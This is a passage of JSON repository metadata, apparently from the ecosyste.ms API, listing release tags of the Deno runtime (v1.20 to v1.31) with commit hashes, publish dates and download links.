@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.